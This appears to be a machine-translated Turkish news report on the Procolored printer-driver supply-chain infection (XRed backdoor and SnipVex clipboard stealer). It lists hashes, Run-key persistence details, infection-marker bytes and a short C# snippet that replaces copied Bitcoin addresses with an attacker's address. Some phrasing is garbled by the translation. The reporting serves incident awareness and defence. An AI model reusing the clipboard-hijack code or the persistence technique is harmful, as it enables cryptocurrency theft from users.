Siber güvenlik olayıyla ilgili bir yazıcı üreticisi, Mayıs 2025’te sona eren, bilmeden dağıtılmış kötü amaçlı enfekte yazılımı yaklaşık altı ay boyunca prodüksiyonu yaptı.
Kanal seri hobisi Cameron Korkak 6.000 dolarlık bir UV yazıcıyı gözden geçirmeye çalıştığında ve antivirüs yazılımı tarafından şirket tarafından sağlanan USB sürüşündeki enfeksiyonlarda uyarıldığında sorun ortaya çıktı.
Başlangıçta potansiyel yanlış pozitifler olarak ortaya çıkan şey, daha sonra meşru kötü amaçlı yazılım olarak doğrulandı ve bir arka kapı ve kripto para biriktirme virüsünün sofistike bir kombinasyonu.
.png
)
Mega.nz Links aracılığıyla Procolored’in web sitesinden indirilebilecek enfekte yazılım paketleri, altı yazıcı ürününü etkileyen kötü amaçlı kod içeriyordu: F8, F13, F13 Pro, V6, V11 Pro ve VF13 Pro.
Kullanıcılar sürücüleri yüklediklerinde, sistemlerine iki farklı kötü amaçlı yazılım suşu ile enfekte oldu: win32.backdoor.xredrat.a ve msil.trojan-stealer.coinstealer.h (Snipvex olarak adlandırılır).
Enfeksiyonlar, çeşitli yazılım paketlerinde toplam 39 dosyayı etkiledi ve 20 benzersiz dosya karması tanımlandı.
G Veri Güvenliği Araştırmacıları, XRED Backdoor bileşeninin daha önce Şubat 2024’te belgelendiğini belirledi, bu da bunun yeni bir tehdit olmadığını, daha ziyade Procolored’in tedarik zincirine giren daha eski bir kötü amaçlı yazılım suşu olduğunu gösterdi.
Analiz, arka kapının, bu sunucular bu olay dikkat çekmeden önce zaten çevrimdışı gitmiş olsa da, daha önce analiz edilen varyantlarla aynı komut ve kontrol URL’lerini içerdiğini ortaya koydu.
Bu enfeksiyonların etkisi sadece veri güvenliği endişelerinin ötesine geçmiştir. Blockchain analizi, saldırganların Bitcoin adresinin, kaçırılan kripto para işlemlerinden yaklaşık 9.3 BTC eşdeğeri yaklaşık 100.000 $ ‘a ulaştığını gösterdi.
Komuta ve kontrol altyapısının Şubat 2024’ten bu yana aktif olmayan olmasına rağmen, arka kapının işlevselliğini sınırladı, snipvex’in dosya bulaşan özellikleri etkilenen sistemler için önemli riskler oluşturmaya devam etti.
Snipvex enfeksiyon mekanizması
Snipvex bileşeni, klasik bir virüs olarak çalışan sofistike bir dosya enfeksiyon stratejisi kullandı.
.webp)
PrintExp.exe örneğini analiz ederken (SHA256: 531D0860645898408672D88513B8A1AC284fdf1FE011019770801B7B46D54344)), araştırmacıların malware’in kendisini meşru uygulanabilir dosyalara hazırladığını buldu.
Virüsün enfeksiyon rutini zarif bir şekilde basit ama etkili oldu. İlk olarak, son üç baytta bir enfeksiyon markeri için hedef dosyaları özellikle bayt sırası 0x0A 0x0b 0x0c’yi kontrol etti.
.webp)
Daha sonra dosyaları % Temp % veya % AppData % dizinlerinin yanı sıra bir nokta ile başlayan herhangi bir dosyada enfekte etmekten kaçındı.
// SnipVex clipboard monitoring code
// Searches for Bitcoin address patterns and replaces them
if (Regex.IsMatch(clipboardText, "[13][a-km-zA-HJ-NP-Z1-9]{25,34}"))
{
Clipboard.SetText("1BQZKqdp2CV3QV5nUEsqSg1ygegLmqRygj");
}Yayılmak için, Snipvex, “.exe” uzantılı dosyalardaki değişiklikler için tüm mantıksal sürücüleri izledi ve bağlı sistemlerde kalıcı bir enfeksiyon vektörü oluşturdu.
Virüs, Windows Kayıt Defteri Çalışma Anahtarları (HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ SCDBCD ve HKEY_CURRENT_USER \ Software \ Microsoft \ Windows \ CurrentVersion \ Run \ Clpbtcn) aracılığıyla kalıcılık oluşturdu ve sistem yeniden başlatmalarında aktif kalmasını sağladı.
Procolored o zamandan beri tüm enfekte olmuş yazılımları web sitelerinden kaldırdı ve etkilenen müşterilere iyileştirme rehberliği verdi ve gelecekteki yazılım dağıtımları için gelişmiş güvenlik önlemleri vaat etti.
How SOC Teams Save Time and Effort with ANY.RUN - Live webinar for SOC teams and managers